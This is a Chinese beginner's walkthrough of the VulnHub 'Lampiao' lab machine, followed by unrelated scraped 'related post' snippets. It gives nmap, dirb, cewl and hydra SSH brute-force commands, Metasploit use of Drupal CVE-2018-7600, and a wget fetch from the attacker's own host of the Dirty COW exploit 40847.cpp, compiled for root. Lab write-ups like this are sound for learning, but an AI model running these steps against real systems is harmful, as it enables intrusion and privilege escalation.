挑战全网最详细靶机教程——vulnhub靶机实战 lampiao【适合刚接触的新人学习】
靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/
靶机难度:中等
工具:kalilinux; 一个灵活的脑子 ; 一双手
目标:得到root权限&找到flag.txt
作者:木木北星
声明:这里使用的技术仅用于学习交流目的,如果列出的技术用于其他任何目标,我概不负责。
第一步信息收集
信息收集在整个渗透过程中占80%左右。在虚拟机中确认攻击的ip地址,nmap获取目标ip地址(有很多工具我个人比较喜欢nmap)
使用命令:nmap -sP 192.168.222.0/24
解释:(ip地址是你自己的物理机ip第三个小数点后面改0/24)
得到ip后开始探索ip地址开放端口和一些服务。继续用nmap全端口扫描:
使用命令:nmap -sS -sV -T5 -A -p- 192.168.222.137
可以看出靶机上有三个可用的开放端口22、80、1898端口。这里对22端口,尝试ssh弱口令爆破,并没有结果,这里就不多说ssh弱口令爆破了,基本上百度都能搜得到,使用msf、hydra等,后期文章攻击也会使用到。由于目标靶机上的端口80可用,我们在浏览器上打开了目标计算机的IP,它显示了一个有趣的页面:
F12 查看这是一个静态页面,没发现什么有用的信息所以换1898端口:
可以分别进入两个页面:
第一栏点进去内容翻译后并没有什么有效的信息,第二栏点进去细心的我发现了这是node/3,这是第三栏的内容,说明还有第二栏的内容没有显示,修改下页面试试。
发现两个文件:
第一个文件内是一个音频,语音内容为:user tiago,则用户名为:tiago
第二个文件是一个二维码,扫码后的内容是一句话:Try harder!Muahuahua...没用的信息
接下来开始用工具对网站进行爆破扫描...(也可以使用御剑)
使用命令: dirb http://192.168.222.137:1898 -o out
找到一个robots.txt的文件,后台打开看看:
经过漫长的信息收集终于在CHANGELOG.txt文件中发现了网站的基本信息
这是一个基于Drupal 7的博客或是社交网站。
cewl:通过爬行网站获取关键信息创建一个密码字典
hydra:神器九头蛇,网上有太多资料
使用命令:cewl http://192.168.222.137:1898/?q=node/1 -w mmbx.txt
hydra -l tiago -P mmbx.txt 192.168.222.137 ssh
先利用cewl来生成一份结合网站目标的社工性质的密码字典、不理解的可以搜索网上搜索cewl学习,然后九头蛇暴力破解得到用户密码:
用户: tiago
密码: Virgulino
重要的来了!!!!使用用户名tiago进行ssh登陆连接,成功连接,但是不能用sudo su进行提权!!
第二部shell提权
现在利用收集到的信息进行提权
刚刚在文件收集到这个网站是2016年的Durpal7
这边我们查询到Drupal漏洞CVE-2018-7600,我们尝试使用MSF进行渗透试试。
先输入指令:msfconsole
再search CVE-2018-7600
然后再use这个指令
rhosts设置靶机IP
rport设置靶机端口
run开跑
成功通过漏洞渗透进入系统,获得低权限用户,和前面ssh登陆的tiago用户权限类似,这是另外一种渗透的方法,可以好好学习。
下一步要找到反弹shell获取root权限,通过网上对Durpal 7版本2016年都可以使用dirty(脏牛)进行提权,非常有名的一个漏洞提权目前已经修复,仅供参考学习。
命令:searchsploit dirty查找脏牛提权shell,利用40847.cpp
思路是继续开启本地pthon服务,然后把40847.cp发送到靶机上
命令:python -m http.server 8879 开启服务
网站登录端口(这里注意,ip地址是你kali的IP地址)
命令:wget http://192.168.222.128 :8879/40847.cpp
将40847.cp上传到靶机上
命令:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
- -Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
- -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
- -O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
- -std=c++11就是用按C++2011标准来编译的
- -pthread 在Linux中要用到多线程时,需要链接pthread库
- -o dcow gcc生成的目标文件,名字为dcow
执行gcc编译可执行文件,可直接提权。
打开文件成功看到靶机root的密码
直接登录root
输入ls(列出目前工作目录所含之文件及子目录)
发现flag最后查看文件
最后:如果本人有哪些步骤没有做的精细的望大佬勿喷,本人也喜欢结实五湖四海的朋友一起探讨学习技术。
有兴趣的可以斯我
挑战全网最详细靶机教程——vulnhub靶机实战 lampiao【适合刚接触的新人学习】相关推荐
- 挑战全网最详细靶机教程——vulnhub靶机实战vulnhub Tr0ll: 1【适合刚接触的新人学习】
靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 靶机难度:简单 靶机发布日期:2014年8月14日 靶机描述:Tr0ll的灵感来自OSCP实验室中不断摇 ...
- 鸿蒙系统电视k歌,华为电视怎么k歌?全网最详细的教程在这里
原标题:华为电视怎么k歌?全网最详细的教程在这里 利用智能电视在家k歌,是一个很不错的娱乐活动.那么,家里的华为怎么电视k歌?需要准备什么设备?下面就为大家分享一份详细教程,看完 两分钟快速开启K歌模 ...
- vscode全网最详细使用教程
vscode下载地址 官网下载:https://code.visualstudio.com/或者直接点击**我的资源**下载 VScode使用教程 安装教程 鼠标左键双击,即可运行安装程序 一:同意协 ...
- 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...
- UIApp教程(全网最详细的教程来啦)
UIApp教程 1. UIApp概述 1.1 UIApp简介 UIApp是一款基于React Native开发的跨平台移动应用开发框架. UIApp提供了丰富的组件库和模板,可以快速构建高质量的移动应 ...
- lombok如何给属性设置_你不得不会的Lombok全面详细讲解,全网最详细的教程
读者范围: 如果你使用过Lombok你可能只使用了部分功能,那么这里列举了所有功能,你继续阅读能完善这方面的知识: 如果你还没用用过,甚至不知道这是什么,那么对不起,你已经被技术淘汰了,这里有一份详尽 ...
- pikachu全网最详细安装教程
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一.phpStudy V8版本安装步骤 二.pikachu安装 前言 pikachu是一个包含了常见的web安全漏洞的 ...
- 【从零开始玩量化17】如何python+QMT完成自动化交易?(全网最详细入门教程)
一.什么是QMT 此部分为扫盲内容,有一定了解者可以跳过. 概念 它是一款量化交易客户端软件,由一家叫做迅投公司出品,可以直接登录你的券商账号进行股票交易,但与同花顺/通信达不同的是,它暴露了基于py ...
- Netty 全网最详细的教程! 没有之一!
Netty 入门 文章目录 Netty 入门 入门案例 1.服务器端代码 2.客户端代码 3.运行流程 组件解释 使用组件 EventLoop 创建一个EventLoopServer 创建一个Clie ...
最新文章
- IDEA如何导入多个maven依赖的项目
- Python测试框架pytest(05)fixture - error和failed、fixture实例化、多个fixture
- windows mobile C# net3.5 如何捕捉Arrow的CheckBox的KeyDown事件?
- esp8266单片机透传_基于WeMos D1(ESP8266)的校园卡门禁系统
- jmeter 安装详解
- 再谈Bellman-Ford
- Servlet3.0
- Android stdio安装
- 三菱PlC程序大型项目QCPU+QD77MS16 包含一套完整的电气开发系统资料(包含plc程序,触摸屏程序,伺服模块设置程序,程序开发地址规划表)
- “一键淘宝”将淘宝网店免费转移到手机客户端教程
- 字节跳动岗位薪酬体系曝光,看完感叹:不服不行
- 如何设置打开图片的默认方式
- 多伦多大学计算机专业硕士,多伦多大学计算机硕士专业 看你满足录取要求吗...
- libdmtx结合OpenCV识别DataMatrix二维码
- 如何使用Win10自带的录屏功能以及如何查找到视频存放的位置
- 区块链正在颠覆的18个行业
- 用matlab代码写一下jackknife方法的校正步骤?、
- 服务器系统壁纸,云服务器壁纸
- 全球名校AI课程库(27)| MIT麻省理工 · 数据结构与算法设计课程『Design and Analysis of Algorithms』
- 【证券】什么是开仓、持仓和平仓?